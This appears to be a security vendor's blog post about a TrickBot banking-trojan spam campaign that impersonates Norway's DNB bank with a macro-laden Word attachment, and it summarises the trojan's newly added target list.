TrickBot In The Nordics, Episode II

The banking trojan TrickBot is not retired yet. Not in the least. In a seemingly never ending series of spam campaigns – not via the Necurs botnet this time – we’ve spotted mails written in Norwegian that appear to be sent by DNB, Norway’s largest bank.

The mail wants the recipient to believe that they have received an important “decision letter” and that they should open the attached document for more information. They also suggest that, if there are problems reading the content, you have to click the “Enable Content” button… uh oh, where have we heard that before?

Anyway, let’s take a look at the attachment “SikreDokumenter.doc” (“Secure Document”). Not that much to see here though.

“Laster Innhold” translates to “Loading content”, but that content never appears. As if it is waiting for the user to click “Enable Content”, as the mail suggests, no? Unfortunately, clicking this button still never reveals anything (how disappointing!). Instead, a Visual Basic macro launches a PowerShell script which will download and execute the TrickBot loader.

And just like last time we wrote about TrickBot, a large spam campaign often goes hand in hand with a malware update. Now the authors are “celebrating” a brand new list of targets. Here’s a short summary:

  • More targeting of finance related sites which are no traditional banks: American Express, Amazon, …
  • A few banks in Mexico, Argentina and Chile. Middle and South America, some of the last parts of the world that TrickBot hadn’t visited yet.
  • New European countries: Croatia, Slovenia, Hungary, Turkey, …
  • More banks in countries targeted before, such as Belgium, The Netherlands, Luxembourg, Germany, Spain, Italy, Poland, Singapore, Australia, New Zealand, …
  • And last but not least: the Nordic countries are back in the game.

Wait, the Nordic banks were gone? That’s right! They appeared in June, but were removed again early August. Our guess was that attacking the Nordics turned out not that profitable – but now they are back. Which immediately explains the localized spam.

But fear not, our security products were already protecting you against this latest campaign.

Special thanks to Päivi for the help.

Tagged: Spam, Th3 Cyb3r, TrickBot, Trojan

Article Link: